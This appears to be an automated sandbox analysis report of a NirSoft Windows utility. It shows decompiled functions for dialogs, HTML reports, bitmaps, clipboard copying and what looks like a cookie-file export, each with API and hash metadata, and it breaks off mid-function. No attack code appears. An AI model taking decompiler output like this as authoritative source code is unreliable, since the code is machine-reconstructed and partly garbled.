					memset( &_v514, 0, 0x1fe);
					L0040DFD6();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040DFD6();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040DFD6();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040DFD6();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x0040d7e1
0x0040d7e6
0x0040d7e7
0x0040d7e8
0x0040d875
0x0040d87c
0x0040d88a
0x0040d891
0x0040d89f
0x0040d8a6
0x0040d8c0
0x0040d8cb
0x0040d8dd
0x0040d8fb
0x0040d900
0x00000000
0x0040d900
0x0040d7f5
0x0040d7fc
0x0040d80a
0x0040d811
0x0040d82b
0x0040d838
0x0040d84a
0x00000000

APIs

memset.MSVCRT ref: 0040D7FC
memset.MSVCRT ref: 0040D811
_snwprintf.MSVCRT ref: 0040D82B
_snwprintf.MSVCRT ref: 0040D84A
memset.MSVCRT ref: 0040D87C
memset.MSVCRT ref: 0040D891
memset.MSVCRT ref: 0040D8A6
_snwprintf.MSVCRT ref: 0040D8C0
_snwprintf.MSVCRT ref: 0040D8DD

Strings

%%0.%df, xrefs: 0040D81E, 0040D8B3

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407047, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040E340(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x4131d0; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00406CC6(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00406DE5(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E00406F88, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00406CC6(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x412c34 =  *0x412c34 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E00406E97(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x0040704f
0x00407054
0x0040705b
0x00407098
0x0040709c
0x004070a2
0x004070aa
0x004070ac
0x004070c2
0x004070c2
0x004070c7
0x004070c8
0x004070e2
0x004070e4
0x004070e6
0x004070e9
0x004070fc
0x004070fc
0x0040710c
0x00407113
0x0040712a
0x00407130
0x00407137
0x00407146
0x0040714b
0x00407157
0x00407160
0x004070ae
0x004070bc
0x004070bc
0x004070be
0x004070c0
0x00000000
0x00000000
0x004070b0
0x004070b3
0x004070b9
0x004070b9
0x00000000
0x004070b9
0x00000000
0x004070b3
0x00000000
0x004070bc
0x004070ac
0x0040705d
0x0040705d
0x00407062
0x00407063
0x00407068
0x0040706f
0x00407075
0x0040707c
0x0040707e
0x00407080
0x00407081
0x00407084
0x0040708d
0x0040708d
0x00407166
0x0040716d

APIs

LoadMenuW.USER32 ref: 0040706F

Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20

DestroyMenu.USER32(00000000), ref: 0040708D
CreateDialogParamW.USER32 ref: 004070E2
GetDesktopWindow.USER32 ref: 004070ED
CreateDialogParamW.USER32 ref: 004070FA
memset.MSVCRT ref: 00407113
GetWindowTextW.USER32 ref: 0040712A
EnumChildWindows.USER32 ref: 00407157
DestroyWindow.USER32(00000005), ref: 00407160

Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB

Strings

caption, xrefs: 00407141

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00409D04, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040E340(0x1800, __ecx);
				_t57 = _t49;
				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x412ed0; // 0x0
				if(_t62 != 0) {
					_push(0x412ed0);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040DFD6();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x412ecc; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040DFD6();
				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00409336(_t57, _t64, _a4);
				}
				return _t43;
			}

0x00409d04
0x00409d0c
0x00409d1c
0x00409d20
0x00409d35
0x00409d3c
0x00409d4a
0x00409d51
0x00409d5f
0x00409d66
0x00409d6b
0x00409d6e
0x00409d7a
0x00409d7c
0x00409d81
0x00409d8c
0x00409d8d
0x00409d8e
0x00409d93
0x00409d93
0x00409d96
0x00409d9c
0x00409daa
0x00409db0
0x00409dcb
0x00409de5
0x00409de6
0x00409df1
0x00409df2
0x00409df3
0x00409e07
0x00409e0c
0x00409e10
0x00000000
0x00409e15
0x00409e1e

APIs

memset.MSVCRT ref: 00409D3C
memset.MSVCRT ref: 00409D51
memset.MSVCRT ref: 00409D66
_snwprintf.MSVCRT ref: 00409D8E
wcscpy.MSVCRT ref: 00409DAA
_snwprintf.MSVCRT ref: 00409DF3

Strings

<table dir="rtl"><tr><td>, xrefs: 00409DA4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040546C(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E004059AA( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040caf2
0x0040cb00
0x0040cb0b
0x0040cb14
0x0040cb33
0x0040cb3b
0x0040cb83
0x0040cbcc
0x0040cb85
0x0040cb8b
0x0040cb99
0x0040cba5
0x0040cbb4
0x0040cbb9
0x0040cbc0
0x0040cbc5
0x0040cb3d
0x0040cb43
0x0040cb51
0x0040cb5d
0x0040cb6a
0x0040cb75
0x0040cb7a
0x0040cbd4
0x0040cbd7
0x0040cbd7
0x0040cb19
0x0040cb1a
0x0040cb1b
0x00000000
0x0040cb21
0x0040cb02
0x00000000

APIs

wcschr.MSVCRT ref: 0040CB0B
wcscpy.MSVCRT ref: 0040CB1B

Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0

wcscpy.MSVCRT ref: 0040CB6A
wcscat.MSVCRT ref: 0040CB75
memset.MSVCRT ref: 0040CB51

Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0

memset.MSVCRT ref: 0040CB99
memcpy.MSVCRT ref: 0040CBB4
wcscat.MSVCRT ref: 0040CBC0

Strings

\systemroot, xrefs: 0040CB28

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DE1, Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00402DE1(void* __fp0) {
				void* _v24;
				void _v28;
				void* _v56;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				intOrPtr _v84;
				long _v88;
				intOrPtr _v92;
				int _v96;
				int _v100;
				intOrPtr _v104;
				int _v108;
				int _v112;
				intOrPtr _v128;
				unsigned int _t51;
				signed char _t52;
				intOrPtr _t53;
				intOrPtr _t64;
				struct HDC__* _t75;

				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v56, 0x18,  &_v28);
				_t75 = CreateCompatibleDC(0);
				_v64 = SelectObject(_t75, _v72);
				_v72 = GetSysColor(0xf);
				_v88 = GetPixel(_t75, 0, 0);
				_v96 = 0;
				if(_v56 > 0) {
					do {
						_v100 = 0;
						if(_v60 > 0) {
							do {
								_t51 = GetPixel(_t75, _v100, _v96);
								if(_t51 != _v100) {
									_t52 = _t51 & 0x000000ff;
									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
									asm("fild dword [esp+0x20]");
									asm("fistp qword [esp+0x28]");
									_t64 = _v84;
									_v92 = _t64;
									asm("fisub dword [esp+0x20]");
									asm("fldz");
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t52 & 0x00000041) == 0) {
										asm("fchs");
									}
									asm("fcomp qword [0x410b70]");
									asm("fnstsw ax");
									_t53 = _t64 + 1;
									if((_t52 & 0x00000001) != 0) {
										_t53 = _t64;
									}
									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
								} else {
									_push(_v96);
								}
								SetPixel(_t75, _v112, _v108, ??);
								_v128 = _v128 + 1;
							} while (_v128 < _v88);
						}
						_v96 = _v96 + 1;
					} while (_v96 < _v56);
				}
				SelectObject(_t75, _v76);
				DeleteDC(_t75);
				return _v104;
			}

0x00402e07
0x00402e0d
0x00402e15
0x00402e16
0x00402e17
0x00402e18
0x00402e19
0x00402e25
0x00402e36
0x00402e41
0x00402e54
0x00402e5e
0x00402e62
0x00402e66
0x00402e6c
0x00402e70
0x00402e74
0x00402e7a
0x00402e83
0x00402e89
0x00402e9c
0x00402ea3
0x00402ea7
0x00402eb3
0x00402eb7
0x00402ebb
0x00402ebf
0x00402ec3
0x00402ec5
0x00402ec7
0x00402ecc
0x00402ece
0x00402ece
0x00402ed0
0x00402ed6
0x00402edb
0x00402ede
0x00402ee0
0x00402ee0
0x00402ef6
0x00402e8b
0x00402e8b
0x00402e8b
0x00402f00
0x00402f06
0x00402f0e
0x00402e7a
0x00402f18
0x00402f20
0x00402e6c
0x00402f2f
0x00402f36
0x00402f46

APIs

GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
LoadImageW.USER32 ref: 00402E01
GetObjectW.GDI32(?,00000018,?), ref: 00402E25
CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
SelectObject.GDI32(00000000,?), ref: 00402E39
GetSysColor.USER32(0000000F), ref: 00402E45
GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
GetPixel.GDI32(00000000,?,?), ref: 00402E83
SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
SelectObject.GDI32(00000000,?), ref: 00402F2F
DeleteDC.GDI32(00000000), ref: 00402F36

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00405F82, Relevance: 16.6, APIs: 11, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405F82() {
				int _v8;
				int _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				struct HDC__* _t46;

				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v52 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v16, 0x18,  &_v52);
				_t46 = CreateCompatibleDC(0);
				_v28 = SelectObject(_t46, _v16);
				_v24 = GetSysColor(0xf);
				_v20 = GetPixel(_t46, 0, 0);
				_v12 = 0;
				if(_v44 > 0) {
					do {
						_v8 = 0;
						if(_v48 > 0) {
							do {
								if(GetPixel(_t46, _v8, _v12) == _v20) {
									SetPixel(_t46, _v8, _v12, _v24);
								}
								_v8 = _v8 + 1;
							} while (_v8 < _v48);
						}
						_v12 = _v12 + 1;
					} while (_v12 < _v44);
				}
				SelectObject(_t46, _v28);
				DeleteDC(_t46);
				return _v16;
			}

0x00405fa5
0x00405faa
0x00405fb0
0x00405fb1
0x00405fb2
0x00405fb3
0x00405fb4
0x00405fbe
0x00405fce
0x00405fd9
0x00405feb
0x00405ff3
0x00405ff6
0x00405ff9
0x00405ffb
0x00405ffe
0x00406001
0x00406003
0x0040600f
0x0040601b
0x0040601b
0x00406021
0x00406027
0x00406003
0x0040602c
0x00406032
0x00405ffb
0x0040603b
0x00406042
0x0040604f

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
LoadImageW.USER32 ref: 00405F9F
GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
SelectObject.GDI32(00000000,?), ref: 00405FD1
GetSysColor.USER32(0000000F), ref: 00405FDC
GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
GetPixel.GDI32(00000000,?,?), ref: 0040600A
SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
SelectObject.GDI32(00000000,?), ref: 0040603B
DeleteDC.GDI32(00000000), ref: 00406042

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405559, Relevance: 16.6, APIs: 11, Instructions: 59
clipboardmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t17;
				void* _t32;
				void* _t37;
				long _t39;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t17 = E00405338(_a4);
				_v12 = _t17;
				if(_t17 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t39 = GetFileSize(_t17, 0);
					_t5 = _t39 + 2; // 0x2
					_t32 = GlobalAlloc(0x2000, _t5);
					if(_t32 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t37 = GlobalLock(_t32);
						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
							GlobalUnlock(_t32);
							SetClipboardData(0xd, _t32);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

0x0040555f
0x00405563
0x0040556c
0x00405575
0x00405578
0x004055f1
0x0040557a
0x00405586
0x00405588
0x00405597
0x0040559b
0x004055d4
0x004055da
0x0040559d
0x004055a6
0x004055b9
0x00000000
0x004055bb
0x004055bd
0x004055c3
0x004055cc
0x004055cc
0x004055b9
0x004055e0
0x004055e8
0x004055f4
0x004055fe

APIs

EmptyClipboard.USER32 ref: 00405563

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
GlobalLock.KERNEL32 ref: 0040559E
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
GlobalUnlock.KERNEL32(00000000), ref: 004055C3
SetClipboardData.USER32 ref: 004055CC
GetLastError.KERNEL32 ref: 004055D4
CloseHandle.KERNEL32(?), ref: 004055E0
GetLastError.KERNEL32 ref: 004055EB
CloseClipboard.USER32 ref: 004055F4

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040228C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				struct _SYSTEMTIME _v88;
				void* _v92;
				struct _FILETIME _v96;
				void* __edi;
				signed int _t29;
				signed int _t34;
				signed int _t39;
				char* _t44;
				void* _t56;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t77;
				long _t90;
				intOrPtr _t91;
				void* _t97;
				signed int _t98;
				signed int _t99;

				_t97 = __esi;
				_t81 =  *((intOrPtr*)(__esi + 0x10));
				_t91 = _a4;
				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
				_t77 = 0x40f454;
				if(_t29 != 0) {
					_t77 = _t29;
				}
				_t99 = _t98 | 0xffffffff;
				_t106 =  *(_t97 + 0x40) & 0x00004000;
				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
					E004063DD(_t99, _t81, _t91, _t106, ".");
				}
				E004063DD(_t99, _t81, _t91, _t106, _t77);
				_t78 = "\t";
				E004063DD(_t99, _t81, _t91, _t106, "\t");
				_t107 =  *(_t97 + 0x40) & 0x00004000;
				_t34 = _t99;
				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
					_push(L"FALSE");
				} else {
					_push(L"TRUE");
				}
				E004063DD(_t34, _t81, _t91, _t107);
				E004063DD(_t99, _t81, _t91, _t107);
				_t82 =  *((intOrPtr*)(_t97 + 0x14));
				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
				_t108 = _t39;
				if(_t39 == 0) {
					_t39 = 0x40f454;
				}
				E004063DD(_t99, _t82, _t91, _t108, _t39);
				E004063DD(_t99, _t82, _t91, _t108, _t78);
				_t109 =  *(_t97 + 0x40) & 0x00000001;
				_t44 = L"TRUE";
				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
					_t44 = L"FALSE";
				}
				E004063DD(_t99, _t82, _t91, _t109, _t44);
				E004063DD(_t99, _t82, _t91, _t109, _t78);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v88.wYear = 0x7b2;
				_v88.wDay = 1;
				_v88.wMonth = 1;
				SystemTimeToFileTime( &_v88,  &_v96);
				_t90 = _v96.dwLowDateTime;
				asm("sbb ecx, edi");
				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
				_push(_t90);
				_push(_t56);
				_push(L"%I64d");
				_push(0x1f);
				_push( &_v88);
				L0040DFD6();
				_t96 = _v20;
				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
				_t80 = "\t";
				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
				_t85 =  *((intOrPtr*)(_t97 + 0x18));
				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
				_t110 = _t64;
				if(_t64 == 0) {
					_t64 = 0x40f454;
				}
				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
